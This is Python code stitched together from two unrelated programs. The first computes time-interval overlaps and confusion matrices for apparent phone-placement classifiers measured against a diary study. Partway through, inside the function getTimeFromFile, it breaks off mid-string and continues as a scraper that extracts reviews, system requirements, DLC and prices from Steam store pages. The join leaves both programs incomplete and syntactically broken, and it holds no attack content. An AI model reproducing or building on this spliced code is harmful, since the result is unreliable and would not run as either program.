curr[1] == next[0]:\n intervals[i] = (curr[0], next[1])\n del intervals[i + 1]\n else:\n i += 1 \n\n\ndef filterSpikesFromIntervals(intervals, intervalsByValue):\n spikeLength = datetime.timedelta(seconds=1)\n i = 1\n indexAddedToIntervalsByValue = -1\n while 
i < len(intervals) - 1:\n interval, intervalBefore, intervalAfter = intervals[i], intervals[i - 1], intervals[i + 1]\n\n timeInterval = interval[0]\n\n if timeInterval[1] - timeInterval[0] <= spikeLength:\n newTimeInterval = (intervalBefore[0][0], intervalAfter[0][1])\n intervals[i - 1] = (newTimeInterval, intervalBefore[1])\n del intervals[i:i+2]\n else:\n timeIntervalBefore = intervalBefore[0]\n classification = intervalBefore[1]\n intervalsByValue[classification].append(timeIntervalBefore)\n indexAddedToIntervalsByValue = i - 1\n i += 1\n\n for j in range(indexAddedToIntervalsByValue + 1, len(intervals)):\n interval = intervals[j]\n timeInterval = interval[0]\n classification = interval[1]\n intervalsByValue[classification].append(timeInterval)\n\n\ndef findCommonIntervalsByValue(intervals1, intervals2, value):\n # print(\"Finding common intervals!\")\n # print intervals1\n # print intervals2\n\n if len(intervals1) == 0 and len(intervals2) == 0:\n return []\n if len(intervals1) == 0:\n return intervals2\n if len(intervals2) == 0:\n return intervals1 \n\n def advance(intervals, i, value):\n while i < len(intervals) and intervals[i][1] != value:\n # print(i)\n i += 1\n return i \n\n i1 = advance(intervals1, 0, value) \n i2 = advance(intervals2, 0, value)\n # print i1, i2 \n \n commonIntervals = []\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n # # print(i1, i2)\n laterStartingInterval, earlierStartingInterval = None, None\n later_i, earlier_i = None, None\n\n if interval1[0] >= interval2[0]:\n laterStartingInterval, earlierStartingInterval = interval1, interval2\n later_i, earlier_i = i1, i2\n else:\n laterStartingInterval, earlierStartingInterval = interval2, interval1\n later_i, earlier_i = i2, i1\n\n if laterStartingInterval[0] >= earlierStartingInterval[1]:\n if earlier_i == i1:\n i1 = advance(intervals1, i1, value)\n else:\n i2 = advance(intervals2, i2, value)\n \n else:\n earlierEndingInterval = earlierStartingInterval if earlierStartingInterval[1] <= laterStartingInterval[1] else laterStartingInterval\n\n commonIntervals.append((laterStartingInterval[0], earlierEndingInterval[1]))\n # print commonIntervals\n\n if earlierStartingInterval[1] == laterStartingInterval[1]:\n # print \"End times are equal\"\n i1 = advance(intervals1, i1, value)\n i2 = advance(intervals2, i2, value)\n\n elif earlierStartingInterval[1] < laterStartingInterval[1]:\n # print \"Early start ends earlier, advance early\"\n if earlier_i == i1:\n i1 = advance(intervals1, i1, value)\n else:\n i2 = advance(intervals2, i2, value)\n # print i1, i2\n else:\n # print \"Early start ends later, advance later\"\n if later_i == i1:\n i1 = advance(intervals1, i1, value)\n else:\n i2 = advance(intervals2, i2, value)\n # print i1, i2\n\n return commonIntervals\n\ndef compareIntervals(intervals1, intervals2):\n i1 = 0\n i2 = 0\n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class1 = intervals1[i1][1]\n class2 = intervals1[i2][1]\n\n startTime = interval1[0] if interval1[0] > interval2[0] else interval2[0]\n endTime = None\n\n comparedIntervals = []\n matchingIntervals = []\n conflictingIntervals = []\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class1 = intervals1[i1][1]\n class2 = intervals2[i2][1]\n\n if interval1[1] == interval2[1]:\n endTime = interval1[1]\n i1 += 1\n i2 += 1\n elif interval1[1] < interval2[1]:\n endTime = interval1[1]\n i1 += 1\n else:\n 
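# Added note (explanatory): in this branch interval2 ends first, so the merged segment is cut at interval2's end and only i2 advances; this two-pointer sweep emits maximal spans over which both label streams are constant.\n 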
endTime = interval2[1]\n i2 += 1\n\n comparedClass = None\n matchingClasses = False\n if class1 == class2:\n comparedClass = class1\n matchingClasses = True\n else:\n comparedClass = str(class1) + \" | \" + str(class2)\n\n comparedInterval = ((startTime, endTime), comparedClass, matchingClasses)\n comparedIntervals.append(comparedInterval)\n\n if matchingClasses:\n matchingIntervals.append(comparedInterval)\n else:\n conflictingIntervals.append(comparedInterval)\n\n startTime = endTime\n\n return comparedIntervals, matchingIntervals, conflictingIntervals\n\n\ndef totalTimeOfIntervals(intervals):\n timeConnected = datetime.timedelta(seconds=00)\n prevState = -1\n for interval, classified, state in intervals:\n start = interval[0]\n end = interval[1]\n timeInBetween = end - start\n timeConnected += timeInBetween\n prevState = end\n\n return timeConnected\n\n\ndef getExpectedIntervals(file):\n intervals = []\n with open(file) as f: \n reader = csv.reader(f)\n prevTime = -1\n prevState = -1\n for row in reader: \n startTime = datetime.datetime.strptime(row[0] + \" \" + row[1], \"%m/%d/%y %H:%M\")\n if prevTime != -1:\n intervals.append(((prevTime, startTime), prevState))\n prevTime = startTime\n prevState = row[2]\n return intervals\n\n\n\n### Joanna Finish #####\n# actualIntervals is a list of intervals, classifications like [((startTime, endTime), \"table\"), ((start, end), \"pocket\")]\ndef checkClassifications(actualIntervals, DATA_DAY, NOW_TIME, expectedIntervals=None, expectedNoSteady = None, normalIntervals=None):\n # However you want to load the expectedIntervals, maybe parse a text file?\n # Just make sure to load them as a list with each item formatted as ((startDateTime, endDateTime), classification)\n\n classificationIntervals = {}\n noSteadyState = combineSteadyState(actualIntervals)\n # print(noSteadyState)\n accuracyLengths = classificationAccWithoutPolicy(actualIntervals, expectedIntervals)\n noSteadyAccuracyLenghts = classificationAccWithoutPolicy(noSteadyState, expectedNoSteady)\n\n # print(accuracyLengths)\n comparedIntervals, matchingIntervals, conflictingIntervals = compareIntervals(normalIntervals, expectedIntervals)\n policyNoSteady = filterSteadyState(comparedIntervals);\n # print(\"STEADY STATE FILTERING: \" );\n # print(intervalsWithoutSteady);\n classificationAccuracy = getClassificationAccuracy(comparedIntervals)\n # print(classificationAccuracy)\n print(\"Policy Confusion Matrix with Steady State\")\n # print(classifierConfusionMatrix(classificationAccuracy))\n noSteadyAccuracy = getClassificationAccuracy(policyNoSteady)\n print(\"Policy Confusion Matrix with NO Steady State\")\n # print(classifierConfusionMatrix(noSteadyAccuracy))\n\n for c in classifiers.CLASSIFIERS:\n # print(actualIntervals[c])\n # if c != classifiers.BACKPACK_CLASSIFIER:\n # continue\n print(c)\n\n\n # comparedIntervals, matchingIntervals, conflictingIntervals = classificationAccWithoutPolicy(actualIntervals[c], expectedIntervals, c)\n # classificationIntervals[c] = (comparedIntervals, matchingIntervals, conflictingIntervals)\n # accuracyLengths = classificationAccWithoutPolicy(actualIntervals, expectedIntervals, c)\n\n\n # print(accuracyLengths)\n\n # print(c)\n # print(matchingIntervals)\n # return\n\n # file = open(RESULTS_DIRECTORY + '/' + 'diary-study-stats-' + DATA_DAY + NOW_TIME + '_' + c +'.txt', 'w+')\n\n # file.write(\"############ DIARY STUDY COMPARISON ############## \\n\")\n\n # interval1, classification1, ismatch1 = comparedIntervals[0]\n # interval2, classification2, ismatch2 = 
comparedIntervals[-1]\n # totalTime = interval2[1] - interval1[0]\n # matchingTime = totalTimeOfIntervals(matchingIntervals)\n # conflictingTime = totalTimeOfIntervals(conflictingIntervals)\n # print(comparedIntervals)\n # return\n\n # print(\"BEFORE FILTERING\");\n # print(comparedIntervals);\n # comparedIntervals = filterSteadyState(comparedIntervals);\n # print(\"STEADY STATE FILTERING: \" );\n # print(intervalsWithoutSteady);\n # classificationAccuracy = getClassificationAccuracy(comparedIntervals, c);\n # print(classificationAccuracy)\n ccm = classifierConfusionMatrix(accuracyLengths[c])\n print(\"Classifier Confusion matrix with Steady State\")\n print(ccm)\n ccm_no = classifierConfusionMatrix(noSteadyAccuracyLenghts[c])\n print(\"Classifier Confusion Matrix with NO Steady State\")\n print(ccm_no)\n\n # accuracyNoSteady = classificationAccWithoutPolicy(noSteadyState[c], expectedIntervals, c)\n # ccm_no = classifierConfusionMatrix(accuracyNoSteady)\n # print(\"Confusion matrix with Steady State\")\n # print(ccm_no)\n # return\n\n\n # file.write(\"Total Time: \" + formatTimeValue(totalTime) + \"\\n\")\n # file.write(\"Total time matching: \" + formatTimeValue(matchingTime) +\"\\n\")\n # file.write(\"% of time matched: \" + str(1.0 * matchingTime/totalTime) + \"\\n\")\n # file.write(\"Total time conflicting: \" + formatTimeValue(conflictingTime) + \"\\n\")\n # file.write(\"% of time conflicted: \" + str(1.0 * conflictingTime/totalTime) + \"\\n\")\n\n # file.write(\"\\n\")\n # file.write(\"\\n\")\n # filterConflicting = getConflictingIntervals(intervalsWithoutSteady)\n\n # file.write(\"All conflicting intervals: \\n\")\n # for interval, classificationString, isMatching in comparedIntervals:\n # file.write(formatTimeValue(interval, withDate=True) + \": \" + classificationString + \"\\n\")\n\n # file.write(\"Conflicting intervals by length:\\n\")\n # for interval, classificationString, isMatching in sorted(comparedIntervals, key=lambda x: intervalLength(x[0]), reverse=True):\n # file.write(formatTimeValue(interval, withDate=True) + \": \" + formatTimeValue(intervalLength(interval))[:15] + \": \" + classificationString + \"\\n\")\n\n # file.close()\n for c in classifiers.CLASSIFIERS:\n print(c)\n if c not in classificationAccuracy:\n continue\n print(\"Policy Confusion Matrix with Steady State\")\n print(classifierConfusionMatrix(classificationAccuracy[c]))\n noSteadyAccuracy = getClassificationAccuracy(policyNoSteady)\n print(\"Policy Confusion Matrix with NO Steady State\")\n print(classifierConfusionMatrix(noSteadyAccuracy[c]))\n\n # Write the results to some file, probably also calculate some stats on what % of time we match/don't match\n # All of comparedIntervals, matchingIntervals, and conflictingIntervals have the following format:\n # ((startDateTime, endDateTime), classificationString, isMatchingClassifications)\n # the classificationString is either one classifier if the expected/actual matched, else two classifier names\n\n# classifier = [true positive, false positive, false negtive, total time]\n\ndef classificationAccWithoutPolicy(intervals1, intervals2):\n i1 = 0\n i2 = 0\n \n interval1 = intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class2 = intervals1[i2][1]\n classifierToVal = intervals1[i1][1]\n\n startTime = interval1[0] if interval1[0] > interval2[0] else interval2[0]\n endTime = None\n\n comparedIntervals = []\n matchingIntervals = []\n conflictingIntervals = []\n accuracyLengths = {}\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = 
intervals1[i1][0]\n interval2 = intervals2[i2][0]\n class2 = intervals2[i2][1]\n classifierToVal = intervals1[i1][1]\n\n if interval1[1] == interval2[1]:\n endTime = interval1[1]\n i1 += 1\n i2 += 1\n elif interval1[1] < interval2[1]:\n endTime = interval1[1]\n i1 += 1\n else:\n endTime = interval2[1]\n i2 += 1\n\n comparedClass = None\n # matchingClasses = False\n length = intervalLength((startTime, endTime))\n for c in classifierToVal:\n # print(c)\n classification = classifierToVal[c]\n if c not in accuracyLengths:\n accuracyLengths[c] = [datetime.timedelta(seconds=0)] * 4\n if c == class2:\n if sum(classification) * 1.0 / len(classification) >= 0.5:\n accuracyLengths[c][0] += length\n # print(\"TRUE POSITIVES\")\n # print(class1)\n # print(class2)\n # print(classification)\n # print(\"\\n\")\n else:\n # if class2 == classifiers.HAND_CLASSIFIER:\n\n # print(\"FALSE NEGATIVES\")\n # # print(class1)\n # print(class2)\n # print(classifierToVal)\n # print((startTime, endTime))\n\n # print(\"\\n\")\n\n\n accuracyLengths[c][2] += length\n #false negatives\n else:\n if sum(classification) * 1.0 / len(classification) > 0.5:\n #false positive\n # print(\"FALSE POSITIVE\")\n # print(class1)\n # print(class2)\n # print(classification)\n # print(sum(classification) * 1.0 / len(classification))\n # print((startTime, endTime))\n # print(\"\\n\")\n\n accuracyLengths[c][1] += length\n\n else :\n # print(\"TRUE NEGATIVES\")\n # print(classification)\n # print(class1)\n # print(class2)\n # print((startTime, endTime))\n # print(\"\\n\")\n accuracyLengths[c][3] += length\n\n\n\n startTime = endTime\n return accuracyLengths\n\n\ndef combineSteadyState(actualIntervals):\n results = []\n i = 0\n\n interval1 = actualIntervals[i][0]\n classifierToVal = actualIntervals[i][1]\n\n prev = {}\n while i < 5:\n interval1 = actualIntervals[i][0]\n classifierToVal = actualIntervals[i][1]\n for c in classifiers.CLASSIFIERS:\n if c not in prev:\n prev[c] = [0]* 5\n prev[c][i%5] = sum(classifierToVal[c]) * 1.0 / len(classifierToVal[c])\n results.append((interval1, classifierToVal))\n i+=1\n\n while i < len(actualIntervals):\n interval1 = actualIntervals[i][0]\n classifierToVal = actualIntervals[i][1]\n prevVal = 0\n prevClass = classifiers.TABLE_CLASSIFIER\n for c in prev:\n if sum(prev[c]) > prevVal:\n prevClass=c\n prevVal = sum(prev[c])\n prev[c][i%5] = sum(classifierToVal[c]) * 1.0 / len(classifierToVal[c])\n condition = sum(classifierToVal[prevClass]) * 1.0 / len(classifierToVal[prevClass]) < 0.5 and sum(classifierToVal[classifiers.STEADY_STATE_CLASSIFIER]) * 1.0 / len(classifierToVal[classifiers.STEADY_STATE_CLASSIFIER]) >= 0.5\n if condition:\n classifierToVal[prevClass] = [1]\n\n results.append((interval1, classifierToVal))\n i+=1\n return results\n\n\n\ndef filterSteadyState(comparedIntervals):\n result = []\n i = 0\n previous = classifiers.STEADY_STATE_CLASSIFIER;\n while (i < len(comparedIntervals)):\n interval, classicationString, isMatching = comparedIntervals[i]\n tokens = classicationString.split(\"|\")\n chosen = tokens[0]\n chosen = chosen.strip()\n if not isMatching:\n expected = tokens[1]\n expected = expected.strip()\n if chosen == classifiers.STEADY_STATE_CLASSIFIER:\n chosen = previous\n else:\n previous = chosen\n if not isMatching and expected == chosen:\n isMatching = True\n result.append((interval, chosen, isMatching));\n else:\n result.append((interval, chosen + \"|\" + expected, isMatching))\n i+=1\n \n return result\n\n\ndef getClassificationAccuracy(comparedIntervals):\n confusionList = {}\n 
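# Added note (explanatory): confusionList maps each class to [true positive, false positive, false negative, total] durations as timedeltas; after the loop the fourth slot is overwritten with the true-negative time, computed as totalTime - tp - fp - fn.\n 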
for interval, classificationString, isMatching in comparedIntervals:\n tokens = classificationString.split(\"|\");\n chosen = tokens[0]\n chosen = chosen.strip()\n # if chosen == classifiers.STEADY_STATE_CLASSIFIER:\n # continue\n if not isMatching:\n expected = tokens[1]\n expected = expected.strip()\n # if expected == classifiers.STEADY_STATE_CLASSIFIER:\n # continue\n if expected not in confusionList:\n confusionList[expected] = [datetime.timedelta(seconds=0)] * 4\n if chosen not in confusionList:\n confusionList[chosen] = [datetime.timedelta(seconds=0)] * 4\n length = intervalLength(interval)\n if isMatching:\n confusionList[chosen][0] += length\n else:\n confusionList[chosen][1] += length\n confusionList[expected][2] += length\n confusionList[expected][3] += length\n confusionList[chosen][3] += length\n\n totalTime = totalTimeOfIntervals(comparedIntervals) \n for c in confusionList:\n tp, fp, fn, tt = confusionList[c]\n tn = totalTime - tp - fp -fn\n confusionList[c][3] = tn\n return confusionList\n\ndef classifierConfusionMatrix(confusionList):\n tp, fp, fn, tn = confusionList\n posTotal = tp + fn\n negTotal = tn + fp\n if posTotal == datetime.timedelta(seconds=0):\n tp = \"N/A\"\n fn = \"N/A\"\n else:\n tp = 1.0 * tp/posTotal\n fn = 1.0 * fn/posTotal\n confusionMatrix = [tp, 1.0 * fp/negTotal, fn, 1.0 * (tn/negTotal)]\n return confusionMatrix\n\n\n\ndef findCommonIntervals(intervals1, intervals2):\n # print(\"Finding common intervals!\")\n # print intervals1\n # print intervals2\n\n if len(intervals1) == 0 and len(intervals2) == 0:\n return []\n if len(intervals1) == 0:\n return []\n if len(intervals2) == 0:\n return []\n\n i1 = 0\n i2 = 0\n # print \"Starting\"\n # print i1, i2 \n \n commonIntervals = []\n while i1 < len(intervals1) and i2 < len(intervals2):\n interval1 = intervals1[i1]\n interval2 = intervals2[i2]\n\n laterStartingInterval, earlierStartingInterval = None, None\n later_i, earlier_i = None, None\n\n if interval1[0] >= interval2[0]:\n # print(\"Interval1 starts after Interval2\")\n laterStartingInterval, earlierStartingInterval = interval1, interval2\n later_i, earlier_i = \"i1\", \"i2\"\n else:\n # print(\"Interval2 starts after Interval1\")\n laterStartingInterval, earlierStartingInterval = interval2, interval1\n later_i, earlier_i = \"i2\", \"i1\"\n\n if laterStartingInterval[0] >= earlierStartingInterval[1]:\n # print(\"GOODBYE\")\n # print(\"Later starting interval starts completely after early interval\")\n if earlier_i == \"i1\":\n i1 += 1\n else:\n i2 += 1\n \n else:\n # print(\"HELLO\")\n earlierEndingInterval = earlierStartingInterval if earlierStartingInterval[1] <= laterStartingInterval[1] else laterStartingInterval\n # print(\"Earlier ending interval:\", formatTimeInterval(earlierEndingInterval))\n \n commonIntervals.append((laterStartingInterval[0], earlierEndingInterval[1]))\n # print(\"Common Intervals:\")\n # for interval in commonIntervals:\n # print(formatTimeInterval(interval))\n\n\n if earlierStartingInterval[1] == laterStartingInterval[1]:\n # print(\"End times are equal\")\n i1 += 1\n i2 += 1\n\n elif earlierStartingInterval[1] < laterStartingInterval[1]:\n # print(\"Early start ends earlier, advance early\")\n if earlier_i == \"i1\":\n i1 += 1\n else:\n i2 += 1\n # print i1, i2\n else:\n # print(\"Early start ends later, advance later\")\n if later_i == \"i1\":\n i1 += 1\n else:\n i2 += 1\n # print i1, i2\n\n return commonIntervals\n\n\n\ndef plotIntervals(intervals):\n times = []\n values = []\n\n for interval in intervals:\n time = 
interval[0]\n times.append(time[0])\n times.append(time[1])\n values.append(interval[1])\n values.append(interval[1])\n\n times = date2num(times)\n\n seconds = SecondLocator() # every second\n minutes = MinuteLocator() # every minute\n hours = HourLocator()\n hoursFmt = DateFormatter('%H:%M')\n minutesFmt = DateFormatter('%H:%M:%S')\n\n fig, ax = plt.subplots()\n ax.plot_date(times, values, '-')\n\n # format the ticks\n ax.xaxis.set_major_locator(hours)\n ax.xaxis.set_major_formatter(hoursFmt)\n ax.xaxis.set_minor_locator(minutes)\n ax.autoscale_view()\n\n\n # format the coords message box\n ax.fmt_xdata = DateFormatter('%H:%M')\n ax.grid(True)\n\n axes = plt.gca()\n axes.set_ylim([-0.25, 1.25])\n\n fig.autofmt_xdate()\n plt.show()\n\n\ndef intervalLength(interval):\n try:\n return interval[1] - interval[0]\n except:\n return datetime.timedelta(seconds=0)\n\n\ndef classifierPolicy(classifiedWindow):\n averagedClassifications = []\n for c, labels in classifiedWindow.items():\n positives = labels.count(1)\n negatives = labels.count(0)\n if positives > negatives:\n averagedClassifications.append(c)\n if len(averagedClassifications) == 1:\n return averagedClassifications[0].getName()\n #use policy (most dangerous) among conflicting classifications\n c = classifiers.CLASSIFIERS\n if c[classifiers.TABLE_CLASSIFIER] in averagedClassifications:\n return classifiers.TABLE_CLASSIFIER\n elif c[classifiers.STEADY_STATE_CLASSIFIER] in averagedClassifications:\n return classifiers.STEADY_STATE_CLASSIFIER\n elif c[classifiers.BACKPACK_CLASSIFIER] in averagedClassifications:\n return classifiers.BACKPACK_CLASSIFIER\n elif c[classifiers.BAG_CLASSIFIER] in averagedClassifications:\n return classifiers.BAG_CLASSIFIER\n elif c[classifiers.POCKET_CLASSIFIER] in averagedClassifications:\n return classifiers.POCKET_CLASSIFIER\n elif c[classifiers.HAND_CLASSIFIER] in averagedClassifications:\n return classifiers.HAND_CLASSIFIER\n else: \n return \"Unknown\"\n\n###### Utilities #######\n\ndef filesToTimesToFilesDict(files, userID, instrument):\n timesToFiles = {}\n for f in files:\n time = getTimeFromFile(f, userID, instrument, True)\n timesToFiles[time] = f \n return timesToFiles\n\ndef timeStringToDateTime(timestring):\n return datetime.datetime.strptime(timestring, '%Y_%m_%d_%H_%M_%S')\n\ndef timeStringsToDateTimes(timeStrings):\n return [timeStringToDateTime(timeString) for timeString in timeStrings]\n\ndef formatTime(dateTime, withDate=False):\n if type(dateTime) is not datetime.datetime:\n return str(dateTime)\n if withDate:\n return dateTime.strftime('%b %d|%H:%M:%S')\n return dateTime.strftime('%H:%M:%S')\n\ndef formatTimeDelta(timeDelta):\n totalSeconds = timeDelta.total_seconds()\n return formatTotalSeconds(totalSeconds)\n\ndef formatTotalSeconds(totalSeconds):\n hours = totalSeconds // 3600\n minutes = (totalSeconds % 3600) // 60\n seconds = totalSeconds % 60\n return str(hours) + 'h:' + str(minutes) + 'm:' + str(seconds) + 's' \n\ndef formatTimeInterval(timeInterval, withDate=False):\n if withDate:\n return '(' + formatTime(timeInterval[0], withDate=True) + '--' + formatTime(timeInterval[1], withDate=True) + ')'\n else:\n return '(' + formatTime(timeInterval[0]) + '--' + formatTime(timeInterval[1]) + ')' \n\ndef formatTimeValue(timeValue, withDate=False):\n if type(timeValue) is str or type(timeValue) is int:\n return str(timeValue) \n if type(timeValue) is datetime.datetime:\n return formatTime(timeValue, withDate)\n elif type(timeValue) is datetime.timedelta:\n return formatTimeDelta(timeValue)\n 
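# Added note (explanatory): formatTimeValue dispatches on type -- str/int pass through, datetime becomes a clock time, timedelta becomes h:m:s, and anything else is assumed to be a (start, end) interval.\n 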
else:\n # must be an interval\n return formatTimeInterval(timeValue, withDate)\n\n\ndef getTimeFromFile(filename, userID, instrument):\n query = DIRECTORY + 'AppMon' + '_' + userID + '.*_' + instrument + '_' + \\\n '(?P
        (.*?)Curators have reviewed this product',\n repr(content_text))\n if len(curator) > 0:\n curator = clean_trn(curator[0])\n else:\n curator = -1\n\n reviews = tree_info.xpath('//*[@id=\"userReviews\"]/div//text()')\n reviews = [clean_trn(x) for x in reviews if clean_trn(x).replace(' ', '').replace(',', '') not in [\"\",\"*\"]]\n reviews_dict = {}\n idx = 0\n while idx < len(reviews):\n if reviews[idx][-1] == \":\":\n key = reviews[idx][:-1]\n reviews_dict[key] = []\n else:\n reviews_dict[key].append(reviews[idx])\n idx += 1\n\n recent_review_count = None\n recent_review_sum = None\n recent_review_detail = None\n recent_review_percent = None\n review_bool = 1\n review_not_enough_bool = 0\n review_count = None\n review_sum = None\n review_detail = None\n review_percent = None\n\n if 'Recent Reviews' in reviews_dict.keys():\n\n if len(reviews_dict['Recent Reviews']) > 2 and reviews_dict['Recent Reviews'][1].strip()[0] == '(' and reviews_dict['Recent Reviews'][1].strip()[-1] == ')':\n recent_review_count = int(reviews_dict['Recent Reviews'][1].replace('(', '').replace(')', '').replace(',', ''))\n recent_review_sum = reviews_dict['Recent Reviews'][0]\n recent_review_detail = reviews_dict['Recent Reviews'][2]\n recent_review_percent = re.findall(r'[0-9]+%', recent_review_detail)\n recent_review_percent = recent_review_percent[0]\n else:\n print(app_id)\n raise\n #\n # elif len(reviews_dict['Recent Reviews']) > 1 and len(re.findall(r'[0-9]+%', reviews_dict['Recent Reviews'][1])) > 0:\n # recent_review_detail = reviews_dict['Recent Reviews'][1]\n # recent_review_percent = re.findall(r'[0-9]+%', recent_review_detail)\n # recent_review_sum = reviews_dict['Recent Reviews'][0]\n # recent_review_count = re.findall(r' (\\d+(?:[.,]\\d+)*) ',recent_review_detail)\n # recent_review_count = recent_review_count[0]\n\n if 'All Reviews' in reviews_dict.keys():\n\n if len(reviews_dict['All Reviews']) > 2 and reviews_dict['All Reviews'][1].strip()[0] == '(' and reviews_dict['All Reviews'][1].strip()[-1] == ')':\n review_count = int(reviews_dict['All Reviews'][1].replace('(', '').replace(')', '').replace(',', ''))\n review_sum = reviews_dict['All Reviews'][0]\n review_detail = reviews_dict['All Reviews'][2]\n review_percent = re.findall(r'[0-9]+%', review_detail)\n review_percent = review_percent[0]\n\n # elif len(reviews_dict['All Reviews']) > 1 and len(re.findall(r'[0-9]+%', reviews_dict['All Reviews'][1])) > 0:\n # review_detail = reviews_dict['All Reviews'][1]\n # review_percent = re.findall(r'[0-9]+%', review_detail)\n # review_sum = reviews_dict['All Reviews'][0]\n # review_count = re.findall(r' (\\d+(?:[.,]\\d+)*) ',review_detail)\n # review_count = review_count[0]\n\n elif len(reviews_dict['All Reviews']) > 1 and reviews_dict['All Reviews'][1] == '- Need more user reviews to generate a score':\n review_count = re.findall(r'[0-9]+', reviews_dict['All Reviews'][0])[0]\n review_not_enough_bool = 1\n elif reviews_dict['All Reviews'][0] == 'No user reviews':\n review_bool = 0\n else:\n print(app_id)\n raise\n\n system_name_list = tree_info.xpath('//div[contains(@class,\"sysreq_tab\")]')\n system_name_list = [clean_trn(x.xpath('./text()')[0]) for x in system_name_list]\n system_name_list = [x.strip() for x in system_name_list if x.strip() != \"\"]\n system_num = len(system_name_list)\n system_req_list = tree_info.xpath('//div[contains(@class,\"game_area_sys_req sysreq_content\")]')\n system_req_list = [x.xpath('.//text()') for x in system_req_list]\n sys_list = []\n if system_num == 0 and 
len(system_req_list) == 0:\n pass\n elif system_num == 0:\n system_num += 1\n assert len(system_req_list) == 1\n sys_text = [clean_trn(x) for x in system_req_list[0] if\n clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n if len(sys_text) > 0:\n sys_card = get_sys_list(sys_text)\n if 'OS' in sys_card['Minimum'].keys():\n sys_list.append({\"system\":sys_card['Minimum']['OS'],'Minimum':sys_card['Minimum'],'Recommended':sys_card['Recommended']})\n else:\n sys_list.append({\"system\": None, 'Minimum': sys_card['Minimum'],'Recommended': sys_card['Recommended']})\n else:\n assert system_num == len(system_req_list)\n for sys_name, sys_detail in zip(system_name_list, system_req_list):\n sys_detail = [clean_trn(x) for x in sys_detail if\n clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n if len(sys_detail) > 0:\n sys_card = get_sys_list(sys_detail)\n sys_list.append({\"system\":sys_name, 'Minimum': sys_card['Minimum'],\n 'Recommended': sys_card['Recommended']})\n\n DLC_bool = 0\n DLC_count = 0\n DLC_detail_list = []\n DLC = tree_info.xpath('//*[@class=\"gameDlcBlocks\"]/a')\n DLC_expend = tree_info.xpath('//*[@id=\"game_area_dlc_expanded\"]/a')\n if len(DLC) > 0:\n DLC_bool = 1\n if len(DLC_expend) > 0:\n DLC += DLC_expend\n DLC_count = len(DLC)\n for dlc in DLC:\n name_list = clean_trn(dlc.xpath('./*[@class=\"game_area_dlc_name\"]//text()')[0])\n price_list = [clean_trn(x) for x in dlc.xpath('./*[@class=\"game_area_dlc_price\"]//text()') if\n clean_trn(x) != \"\"][-1].replace(\"$\", \"\")\n DLC_detail_list.append((name_list, price_list))\n\n new_item_dict = {\n 'game_id': app_id,\n 'name': app_name,\n 'request_status':'Available',\n 'game_title': game_title,\n 'IF_DLC': IF_DLC,\n 'genre': genre,\n 'genre_count': genre_count,\n 'developer': developer,\n 'developer_count': developer_count,\n 'publisher': publisher,\n 'publisher_count': publisher_count,\n 'franchiser': franchiser,\n 'franchiser_count': franchiser_count,\n 'release_date': release_date,\n 'usertag': usertag,\n 'usertag_count': usertag_count,\n 'description_short': description_short,\n 'description_title': description_title,\n 'description_long': description_long,\n 'price': price_,\n 'feature': feature,\n 'feature_count': feature_count,\n 'steam_learning': steam_learning,\n 'language': language,\n 'language_count': language_count,\n 'rating': rating,\n 'rating_standard': rating_standard,\n 'rating_icon': rating_icon,\n 'award_bool': award_bool,\n 'award': award,\n 'metacritic': metacritic,\n 'curator': curator,\n 'review_bool': review_bool,\n 'review_not_enough_bool': review_not_enough_bool,\n 'review_count': review_count,\n 'review_sum': review_sum,\n 'review_detail': review_detail,\n 'review_percent': review_percent,\n 'recent_review_count': recent_review_count,\n 'recent_review_sum': recent_review_sum,\n 'recent_review_detail': recent_review_detail,\n 'recent_review_percent': recent_review_percent,\n 'system_count': system_num,\n 'sys_card': sys_list,\n 'DLC_bool': DLC_bool,\n 'DLC_count': DLC_count,\n 'DLC_detail_list': DLC_detail_list, }\n return new_item_dict\n\n\ndef get_onepackage(content_text, pre_difined_item):\n app_id = pre_difined_item['game_id']\n app_name = pre_difined_item['name']\n tree_info = etree.HTML(content_text)\n game_title = tree_info.xpath('//*[@id=\"appHubAppName\"]//text()')\n info_card = tree_info.xpath('//*[@class=\"details_block\"]//p//text()')\n info_card = [clean_trn(x) for x in info_card if clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n init_card = {}\n idx = 0\n key = None\n 
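# Added note (explanatory): info_card is a flat list alternating 'Key:' markers and their values, so this fold groups each value under the most recent key, e.g. ['Developer:', 'Valve'] becomes {'Developer': ['Valve']}.\n 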
while idx < len(info_card):\n if info_card[idx][-1] == \":\":\n key = info_card[idx][:-1]\n init_card[key] = []\n elif key:\n init_card[key].append(info_card[idx])\n idx += 1\n\n developer = []\n developer_count = 0\n if 'Developer' in init_card.keys():\n developer = init_card['Developer']\n developer_count = len(developer)\n\n publisher = []\n publisher_count = 0\n if 'Publisher' in init_card.keys():\n publisher = init_card['Publisher']\n publisher_count = len(publisher)\n\n franchiser = []\n franchiser_count = 0\n if 'Franchise' in init_card.keys():\n franchiser = init_card['Franchise']\n franchiser_count = len(franchiser)\n\n language = []\n language_count = 0\n if 'Languages' in init_card.keys():\n language = [x.strip() for x in init_card['Languages'][0].split(',')]\n language_count = len(language)\n\n release_date = init_card['Release Date'][0]\n release_date = convert_month(release_date)\n\n description_title = check_blank(\n ' '.join([clean_trn(x) for x in tree_info.xpath('//*[@id=\"game_area_description\"]/h2/text()')])).strip()\n description_long = check_blank(\n ' '.join([clean_trn(x) for x in tree_info.xpath('//*[@id=\"game_area_description\"]//text()')]))\n description_long = description_long.replace(description_title, \"\").strip()\n\n price_ = -1\n purchase = tree_info.xpath('//*[@class=\"game_purchase_action\"]')\n if len(purchase) > 0:\n purchase = purchase[0].xpath('.//text()')\n price = [clean_trn(x) for x in purchase if clean_trn(x).replace(' ', '').replace(',', '') != \"\"]\n for i in range(len(price)):\n if price[i] == 'Add to Cart':\n break\n if '$' in price[i]:\n price_ = price[i].replace('$', '')\n if price[i] in ['Free to Play', 'Free', 'Play Game'] or 'Free' in price[i]:\n price_ = 0\n break\n\n feature = tree_info.xpath('//*[@class=\"game_area_details_specs\"]//text()')\n feature = [clean_trn(x) for x in feature]\n feature_count = len(feature)\n\n learning_about = 